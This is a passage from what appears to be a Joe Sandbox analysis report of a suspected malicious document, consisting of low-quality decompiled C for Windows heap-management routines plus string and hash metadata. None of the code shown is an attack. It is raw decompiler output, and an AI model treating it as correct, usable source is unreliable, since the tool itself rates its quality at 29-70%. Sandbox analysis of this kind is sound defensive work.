                                                  																	while(1) {
                                                  																		_t347 =  *(_t298 + _t431 * 4);
                                                  																		_v24 = _t347;
                                                  																		if((_t347 & 0x00000001) != 0) {
                                                  																			goto L71;
                                                  																		}
                                                  																		 *(_t298 + _t431 * 4) =  *_t347;
                                                  																		_t300 =  *(_t347 + 4) & _t395;
                                                  																		_t398 = _v16;
                                                  																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                                  																		_t303 = _v24;
                                                  																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
                                                  																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
                                                  																		_t395 = _v32;
                                                  																		_t298 = _v12;
                                                  																	}
                                                  																	L71:
                                                  																	_v20 = _t431 + 1;
                                                  																	_t428 = _v40;
                                                  																} while (_v20 <  *(_t428 + 4) >> 5);
                                                  																goto L72;
                                                  															} else {
                                                  																_t399 = _v24;
                                                  																do {
                                                  																	_t399 = _t399 + 1;
                                                  																	 *_t295 = _t230;
                                                  																	_t295 = _t295 + 4;
                                                  																} while (_t399 < _t341);
                                                  																goto L67;
                                                  															}
                                                  														}
                                                  														_t354 = _t337 | 0xffffffff;
                                                  														if(_t413 == 0) {
                                                  															L61:
                                                  															_t413 = 1 << _t354;
                                                  															goto L62;
                                                  														} else {
                                                  															goto L60;
                                                  														}
                                                  														do {
                                                  															L60:
                                                  															_t354 = _t354 + 1;
                                                  															_t413 = _t413 >> 1;
                                                  														} while (_t413 != 0);
                                                  														goto L61;
                                                  													}
                                                  												}
                                                  												_t89 = _t412 + 8; // 0x8
                                                  												_t244 = E0187E7A8(_t89);
                                                  												_t289 = _v36;
                                                  												if(_t244 == 0) {
                                                  													_t412 = 0;
                                                  												}
                                                  												goto L75;
                                                  											}
                                                  											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                                                  											_t323 = _v32;
                                                  											while(1) {
                                                  												L41:
                                                  												_t386 =  *_t386;
                                                  												_v12 = _t386;
                                                  												if((_t386 & 0x00000001) != 0) {
                                                  													break;
                                                  												}
                                                  												if(_t323 == ( *(_t386 + 4) & _v16)) {
                                                  													L45:
                                                  													if(_t386 == 0) {
                                                  														goto L53;
                                                  													}
                                                  													if(E0187E7EB(_t386, _t408) != 0) {
                                                  														_t412 = _v12;
                                                  														goto L50;
                                                  													}
                                                  													_t386 = _v12;
                                                  													goto L38;
                                                  												}
                                                  											}
                                                  											_t386 = 0;
                                                  											_v12 = 0;
                                                  											goto L45;
                                                  										}
                                                  									}
                                                  									_t412 = 0;
                                                  									goto L77;
                                                  								}
                                                  								_t38 = _t406 + 8; // 0x8
                                                  								_t364 = _t38;
                                                  								if(E0187E7A8(_t38) == 0) {
                                                  									_t406 = 0;
                                                  								}
                                                  								E017CFA00(_t289, _t364, _t406, _v20);
                                                  								goto L77;
                                                  							}
                                                  							_t24 = _t418 - 1; // -1
                                                  							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
                                                  							_t316 = _v32;
                                                  							L21:
                                                  							_t406 = _v24;
                                                  							while(1) {
                                                  								_t385 =  *_t385;
                                                  								_v12 = _t385;
                                                  								if((_t385 & 0x00000001) != 0) {
                                                  									break;
                                                  								}
                                                  								if(_t316 == ( *(_t385 + 4) & _t406)) {
                                                  									L26:
                                                  									if(_t385 == 0) {
                                                  										goto L35;
                                                  									}
                                                  									_t177 = E0187E7EB(_t385, _v16);
                                                  									if(_t177 != 0) {
                                                  										_t406 = _v12;
                                                  										goto L31;
                                                  									}
                                                  									_t385 = _v12;
                                                  									goto L18;
                                                  								}
                                                  							}
                                                  							_t385 = 0;
                                                  							_v12 = 0;
                                                  							goto L26;
                                                  						}
                                                  					}
                                                  					_t419 = _t404 - 1;
                                                  					if(_t419 == 0) {
                                                  						L15:
                                                  						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                  						_t425 =  &(_t425[1]);
                                                  						goto L16;
                                                  					}
                                                  					_t420 = _t419 - 1;
                                                  					if(_t420 == 0) {
                                                  						L14:
                                                  						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                  						_t425 =  &(_t425[1]);
                                                  						goto L15;
                                                  					}
                                                  					_t421 = _t420 - 1;
                                                  					if(_t421 == 0) {
                                                  						L13:
                                                  						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                  						_t425 =  &(_t425[1]);
                                                  						goto L14;
                                                  					}
                                                  					_t422 = _t421 - 1;
                                                  					if(_t422 == 0) {
                                                  						L12:
                                                  						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                  						_t425 =  &(_t425[1]);
                                                  						goto L13;
                                                  					}
                                                  					_t423 = _t422 - 1;
                                                  					if(_t423 == 0) {
                                                  						L11:
                                                  						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                  						_t425 =  &(_t425[1]);
                                                  						goto L12;
                                                  					}
                                                  					if(_t423 != 1) {
                                                  						goto L17;
                                                  					} else {
                                                  						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                  						_t425 =  &(_t425[1]);
                                                  						goto L11;
                                                  					}
                                                  				} else {
                                                  					_t401 = _t403 >> 3;
                                                  					_t403 = _t403 + _t401 * 0xfffffff8;
                                                  					do {
                                                  						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
                                                  						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
                                                  						_t288 = _t425[7] & 0x000000ff;
                                                  						_t425 =  &(_t425[8]);
                                                  						_t289 = _t310 + _t383 + _t288;
                                                  						_t401 = _t401 - 1;
                                                  					} while (_t401 != 0);
                                                  					goto L3;
                                                  				}
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: a7220c762067b51cedc74fd3c81710ee89422d6de05a241ea57158e1a7e3bc79
                                                  • Instruction ID: c519a464f5a5d48fd9befe5638ce35c87987c3f8ca8479a04ba37b4cae7687f5
                                                  • Opcode Fuzzy Hash: a7220c762067b51cedc74fd3c81710ee89422d6de05a241ea57158e1a7e3bc79
                                                  • Instruction Fuzzy Hash: E302A272E006169BCB18CF6DC89167EFBF6EF88300B1981ADD456EB391D634EA41CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 29%
                                                  			E017A40E1(void* __edx) {
                                                  				void* _t19;
                                                  				void* _t29;
                                                  
                                                  				_t28 = _t19;
                                                  				_t29 = __edx;
                                                  				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  						_push("HEAP: ");
                                                  						E017AB150();
                                                  					} else {
                                                  						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  					}
                                                  					E017AB150("Invalid heap signature for heap at %p", _t28);
                                                  					if(_t29 != 0) {
                                                  						E017AB150(", passed to %s", _t29);
                                                  					}
                                                  					_push("\n");
                                                  					E017AB150();
                                                  					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                  						 *0x1896378 = 1;
                                                  						asm("int3");
                                                  						 *0x1896378 = 0;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 1;
                                                  			}






                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                  • API String ID: 0-188067316
                                                  • Opcode ID: f35d8460c1708914075f62c755859a5cfb56a404f0eb6d802c69a87afc2b8ac6
                                                  • Instruction ID: 3e4dbb4c8e8de8bd5b9432effe0ab9eccc063be02a3318959e9b17c34b5aa926
                                                  • Opcode Fuzzy Hash: f35d8460c1708914075f62c755859a5cfb56a404f0eb6d802c69a87afc2b8ac6
                                                  • Instruction Fuzzy Hash: 7801C032140644BED326A76DE8DDF52FBA4DB80F78F2A426EF00987781CAE4A940C215
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E017CA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                                  				void* _v5;
                                                  				signed short _v12;
                                                  				intOrPtr _v16;
                                                  				signed int _v20;
                                                  				signed short _v24;
                                                  				signed short _v28;
                                                  				signed int _v32;
                                                  				signed short _v36;
                                                  				signed int _v40;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _v48;
                                                  				signed short* _v52;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __ebp;
                                                  				signed int _t131;
                                                  				signed char _t134;
                                                  				signed int _t138;
                                                  				char _t141;
                                                  				signed short _t142;
                                                  				void* _t146;
                                                  				signed short _t147;
                                                  				intOrPtr* _t149;
                                                  				intOrPtr _t156;
                                                  				signed int _t167;
                                                  				signed int _t168;
                                                  				signed short* _t173;
                                                  				signed short _t174;
                                                  				intOrPtr* _t182;
                                                  				signed short _t184;
                                                  				intOrPtr* _t187;
                                                  				intOrPtr _t197;
                                                  				intOrPtr _t206;
                                                  				intOrPtr _t210;
                                                  				signed short _t211;
                                                  				intOrPtr* _t212;
                                                  				signed short _t214;
                                                  				signed int _t216;
                                                  				intOrPtr _t217;
                                                  				signed char _t225;
                                                  				signed short _t235;
                                                  				signed int _t237;
                                                  				intOrPtr* _t238;
                                                  				signed int _t242;
                                                  				unsigned int _t245;
                                                  				signed int _t251;
                                                  				intOrPtr* _t252;
                                                  				signed int _t253;
                                                  				intOrPtr* _t255;
                                                  				signed int _t256;
                                                  				void* _t257;
                                                  				void* _t260;
                                                  
                                                  				_t256 = __edx;
                                                  				_t206 = __ecx;
                                                  				_t235 = _a4;
                                                  				_v44 = __ecx;
                                                  				_v24 = _t235;
                                                  				if(_t235 == 0) {
                                                  					L41:
                                                  					return _t131;
                                                  				}
                                                  				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                                  				if(_t251 == 0) {
                                                  					__eflags =  *0x1898748 - 1;
                                                  					if( *0x1898748 >= 1) {
                                                  						__eflags =  *(__edx + 2) & 0x00000008;
                                                  						if(( *(__edx + 2) & 0x00000008) == 0) {
                                                  							_t110 = _t256 + 0xfff; // 0xfe7
                                                  							__eflags = (_t110 & 0xfffff000) - __edx;
                                                  							if((_t110 & 0xfffff000) != __edx) {
                                                  								_t197 =  *[fs:0x30];
                                                  								__eflags =  *(_t197 + 0xc);
                                                  								if( *(_t197 + 0xc) == 0) {
                                                  									_push("HEAP: ");
                                                  									E017AB150();
                                                  									_t260 = _t257 + 4;
                                                  								} else {
                                                  									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  									_t260 = _t257 + 8;
                                                  								}
                                                  								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                  								E017AB150();
                                                  								_t257 = _t260 + 4;
                                                  								__eflags =  *0x1897bc8;
                                                  								if(__eflags == 0) {
                                                  									E01862073(_t206, 1, _t251, __eflags);
                                                  								}
                                                  								_t235 = _v24;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				_t134 =  *((intOrPtr*)(_t256 + 6));
                                                  				if(_t134 == 0) {
                                                  					_t210 = _t206;
                                                  					_v48 = _t206;
                                                  				} else {
                                                  					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                  					_v48 = _t210;
                                                  				}
                                                  				_v5 =  *(_t256 + 2);
                                                  				do {
                                                  					if(_t235 > 0xfe00) {
                                                  						_v12 = 0xfe00;
                                                  						__eflags = _t235 - 0xfe01;
                                                  						if(_t235 == 0xfe01) {
                                                  							_v12 = 0xfdf0;
                                                  						}
                                                  						_t138 = 0;
                                                  					} else {
                                                  						_v12 = _t235 & 0x0000ffff;
                                                  						_t138 = _v5;
                                                  					}
                                                  					 *(_t256 + 2) = _t138;
                                                  					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                                  					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                                  					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                                  						_t141 = 0;
                                                  					} else {
                                                  						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                                  						_v40 = _t141;
                                                  						if(_t141 >= 0xfe) {
                                                  							_push(_t210);
                                                  							E0186A80D(_t236, _t256, _t210, 0);
                                                  							_t141 = _v40;
                                                  						}
                                                  					}
                                                  					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                                  					 *((char*)(_t256 + 6)) = _t141;
                                                  					_t142 = _v12;
                                                  					 *_t256 = _t142;
                                                  					 *(_t256 + 3) = 0;
                                                  					_t211 = _t142 & 0x0000ffff;
                                                  					 *((char*)(_t256 + 7)) = 0;
                                                  					_v20 = _t211;
                                                  					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                                  						_t119 = _t256 + 0x10; // -8
                                                  						E017FD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                                  						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                                  						_t211 = _v20;
                                                  					}
                                                  					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                                  					if(_t252 == 0) {
                                                  						L56:
                                                  						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                                  						_t146 = _t206 + 0xc0;
                                                  						goto L19;
                                                  					} else {
                                                  						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                                  							L15:
                                                  							_t185 = _t211;
                                                  							goto L17;
                                                  						} else {
                                                  							while(1) {
                                                  								_t187 =  *_t252;
                                                  								if(_t187 == 0) {
                                                  									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                  									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                  									goto L17;
                                                  								}
                                                  								_t252 = _t187;
                                                  								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                                  									continue;
                                                  								}
                                                  								goto L15;
                                                  							}
                                                  							while(1) {
                                                  								L17:
                                                  								_t212 = E017CAB40(_t206, _t252, 1, _t185, _t211);
                                                  								if(_t212 != 0) {
                                                  									_t146 = _t206 + 0xc0;
                                                  									break;
                                                  								}
                                                  								_t252 =  *_t252;
                                                  								_t211 = _v20;
                                                  								_t185 =  *(_t252 + 0x14);
                                                  							}
                                                  							L19:
                                                  							if(_t146 != _t212) {
                                                  								_t237 =  *(_t206 + 0x4c);
                                                  								_t253 = _v20;
                                                  								while(1) {
                                                  									__eflags = _t237;
                                                  									if(_t237 == 0) {
                                                  										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                                  									} else {
                                                  										_t184 =  *(_t212 - 8);
                                                  										_t237 =  *(_t206 + 0x4c);
                                                  										__eflags = _t184 & _t237;
                                                  										if((_t184 & _t237) != 0) {
                                                  											_t184 = _t184 ^  *(_t206 + 0x50);
                                                  											__eflags = _t184;
                                                  										}
                                                  										_t147 = _t184 & 0x0000ffff;
                                                  									}
                                                  									__eflags = _t253 - (_t147 & 0x0000ffff);
                                                  									if(_t253 <= (_t147 & 0x0000ffff)) {
                                                  										goto L20;
                                                  									}
                                                  									_t212 =  *_t212;
                                                  									__eflags = _t206 + 0xc0 - _t212;
                                                  									if(_t206 + 0xc0 != _t212) {
                                                  										continue;
                                                  									} else {
                                                  										goto L20;
                                                  									}
                                                  									goto L56;
                                                  								}
                                                  							}
                                                  							L20:
                                                  							_t149 =  *((intOrPtr*)(_t212 + 4));
                                                  							_t33 = _t256 + 8; // -16
                                                  							_t238 = _t33;
                                                  							_t254 =  *_t149;
                                                  							if( *_t149 != _t212) {
                                                  								_push(_t212);
                                                  								E0186A80D(0, _t212, 0, _t254);
                                                  							} else {
                                                  								 *_t238 = _t212;
                                                  								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                                  								 *_t149 = _t238;
                                                  								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                                  							}
                                                  							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                                  							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                                  							if(_t255 == 0) {
                                                  								L36:
                                                  								if( *(_t206 + 0x4c) != 0) {
                                                  									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                                  									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                                  								}
                                                  								_t210 = _v48;
                                                  								_t251 = _v12 & 0x0000ffff;
                                                  								_t131 = _v20;
                                                  								_t235 = _v24 - _t131;
                                                  								_v24 = _t235;
                                                  								_t256 = _t256 + _t131 * 8;
                                                  								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                                  									goto L41;
                                                  								} else {
                                                  									goto L39;
                                                  								}
                                                  							} else {
                                                  								_t216 =  *_t256 & 0x0000ffff;
                                                  								_v28 = _t216;
                                                  								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                                  									L28:
                                                  									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                                  									_v32 = _t242;
                                                  									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                                  										_t167 = _t242 + _t242;
                                                  									} else {
                                                  										_t167 = _t242;
                                                  									}
                                                  									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                                  									_t168 = _t167 << 2;
                                                  									_v40 = _t168;
                                                  									_t206 = _v44;
                                                  									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                                  									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                                  										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                                  									}
                                                  									_t217 = _v16;
                                                  									if(_t217 != 0) {
                                                  										_t173 = _t217 - 8;
                                                  										_v52 = _t173;
                                                  										_t174 =  *_t173;
                                                  										__eflags =  *(_t206 + 0x4c);
                                                  										if( *(_t206 + 0x4c) != 0) {
                                                  											_t245 =  *(_t206 + 0x50) ^ _t174;
                                                  											_v36 = _t245;
                                                  											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                                  											__eflags = _t245 >> 0x18 - _t225;
                                                  											if(_t245 >> 0x18 != _t225) {
                                                  												_push(_t225);
                                                  												E0186A80D(_t206, _v52, 0, 0);
                                                  											}
                                                  											_t174 = _v36;
                                                  											_t217 = _v16;
                                                  											_t242 = _v32;
                                                  										}
                                                  										_v28 = _v28 - (_t174 & 0x0000ffff);
                                                  										__eflags = _v28;
                                                  										if(_v28 > 0) {
                                                  											goto L34;
                                                  										} else {
                                                  											goto L33;
                                                  										}
                                                  									} else {
                                                  										L33:
                                                  										_t58 = _t256 + 8; // -16
                                                  										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                                  										_t206 = _v44;
                                                  										_t217 = _v16;
                                                  										L34:
                                                  										if(_t217 == 0) {
                                                  											asm("bts eax, edx");
                                                  										}
                                                  										goto L36;
                                                  									}
                                                  								} else {
                                                  									goto L24;
                                                  								}
                                                  								while(1) {
                                                  									L24:
                                                  									_t182 =  *_t255;
                                                  									if(_t182 == 0) {
                                                  										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                                  										__eflags = _t216;
                                                  										goto L28;
                                                  									}
                                                  									_t255 = _t182;
                                                  									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                                  										continue;
                                                  									} else {
                                                  										goto L28;
                                                  									}
                                                  								}
                                                  								goto L28;
                                                  							}
                                                  						}
                                                  					}
                                                  					L39:
                                                  				} while (_t235 != 0);
                                                  				_t214 = _v12;
                                                  				_t131 =  *(_t206 + 0x54) ^ _t214;
                                                  				 *(_t256 + 4) = _t131;
                                                  				if(_t214 == 0) {
                                                  					__eflags =  *0x1898748 - 1;
                                                  					if( *0x1898748 >= 1) {
                                                  						_t127 = _t256 + 0xfff; // 0xfff
                                                  						_t131 = _t127 & 0xfffff000;
                                                  						__eflags = _t131 - _t256;
                                                  						if(_t131 != _t256) {
                                                  							_t156 =  *[fs:0x30];
                                                  							__eflags =  *(_t156 + 0xc);
                                                  							if( *(_t156 + 0xc) == 0) {
                                                  								_push("HEAP: ");
                                                  								E017AB150();
                                                  							} else {
                                                  								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  							}
                                                  							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                  							_t131 = E017AB150();
                                                  							__eflags =  *0x1897bc8;
                                                  							if(__eflags == 0) {
                                                  								_t131 = E01862073(_t206, 1, _t251, __eflags);
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				goto L41;
                                                  			}

                                                  Strings
                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 018122F3
                                                  • HEAP: , xrefs: 018122E6, 018123F6
                                                  • HEAP[%wZ]: , xrefs: 018122D7, 018123E7
                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01812403
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                  • API String ID: 0-1657114761
                                                  • Opcode ID: 0bfa95f9b3827c35071e88c59dcfa558465530ba9d0704b803a73b2c50d52ab7
                                                  • Instruction ID: 4337a585b9bed25448a94b64ae592f1dc4871f18c96058459e626e576e5b7387
                                                  • Opcode Fuzzy Hash: 0bfa95f9b3827c35071e88c59dcfa558465530ba9d0704b803a73b2c50d52ab7
                                                  • Instruction Fuzzy Hash: 49D1CD74A0064A9FDB19CF6CC490BAAFBF2FF48701F15856DD94A9B346E330AA41CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E017CA229(void* __ecx, void* __edx) {
                                                  				signed int _v20;
                                                  				char _v24;
                                                  				char _v28;
                                                  				void* _v44;
                                                  				void* _v48;
                                                  				void* _v56;
                                                  				void* _v60;
                                                  				void* __ebx;
                                                  				signed int _t55;
                                                  				signed int _t57;
                                                  				void* _t61;
                                                  				intOrPtr _t62;
                                                  				void* _t65;
                                                  				void* _t71;
                                                  				signed char* _t74;
                                                  				intOrPtr _t75;
                                                  				signed char* _t80;
                                                  				intOrPtr _t81;
                                                  				void* _t82;
                                                  				signed char* _t85;
                                                  				signed char _t91;
                                                  				void* _t103;
                                                  				void* _t105;
                                                  				void* _t121;
                                                  				void* _t129;
                                                  				signed int _t131;
                                                  				void* _t133;
                                                  
                                                  				_t105 = __ecx;
                                                  				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                  				_t103 = __edx;
                                                  				_t129 = __ecx;
                                                  				E017CDF24(__edx,  &_v28, _t133);
                                                  				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                  				asm("sbb edi, edi");
                                                  				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                  				if(_t55 != 0) {
                                                  					_push(0);
                                                  					_push(0x14);
                                                  					_push( &_v24);
                                                  					_push(3);
                                                  					_push(_t129);
                                                  					_push(0xffffffff);
                                                  					_t57 = E017E9730();
                                                  					__eflags = _t57;
                                                  					if(_t57 < 0) {
                                                  						L17:
                                                  						_push(_t105);
                                                  						E0186A80D(_t129, 1, _v20, 0);
                                                  						_t121 = 4;
                                                  						goto L1;
                                                  					}
                                                  					__eflags = _v20 & 0x00000060;
                                                  					if((_v20 & 0x00000060) == 0) {
                                                  						goto L17;
                                                  					}
                                                  					__eflags = _v24 - _t129;
                                                  					if(_v24 == _t129) {
                                                  						goto L1;
                                                  					}
                                                  					goto L17;
                                                  				}
                                                  				L1:
                                                  				_push(_t121);
                                                  				_push(0x1000);
                                                  				_push(_t133 + 0x14);
                                                  				_push(0);
                                                  				_push(_t133 + 0x20);
                                                  				_push(0xffffffff);
                                                  				_t61 = E017E9660();
                                                  				_t122 = _t61;
                                                  				if(_t61 < 0) {
                                                  					_t62 =  *[fs:0x30];
                                                  					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                  					__eflags =  *(_t62 + 0xc);
                                                  					if( *(_t62 + 0xc) == 0) {
                                                  						_push("HEAP: ");
                                                  						E017AB150();
                                                  					} else {
                                                  						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  					}
                                                  					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                  					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                  					_push(_t129);
                                                  					E017AB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                  					_t65 = 0;
                                                  					L13:
                                                  					return _t65;
                                                  				}
                                                  				_t71 = E017C7D50();
                                                  				_t124 = 0x7ffe0380;
                                                  				if(_t71 != 0) {
                                                  					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  				} else {
                                                  					_t74 = 0x7ffe0380;
                                                  				}
                                                  				if( *_t74 != 0) {
                                                  					_t75 =  *[fs:0x30];
                                                  					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                  					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                  						E0186138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                  					}
                                                  				}
                                                  				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                  				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                  				if(E017C7D50() != 0) {
                                                  					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  				} else {
                                                  					_t80 = _t124;
                                                  				}
                                                  				if( *_t80 != 0) {
                                                  					_t81 =  *[fs:0x30];
                                                  					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                  					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                  						__eflags = E017C7D50();
                                                  						if(__eflags != 0) {
                                                  							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  						}
                                                  						E01861582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                  					}
                                                  				}
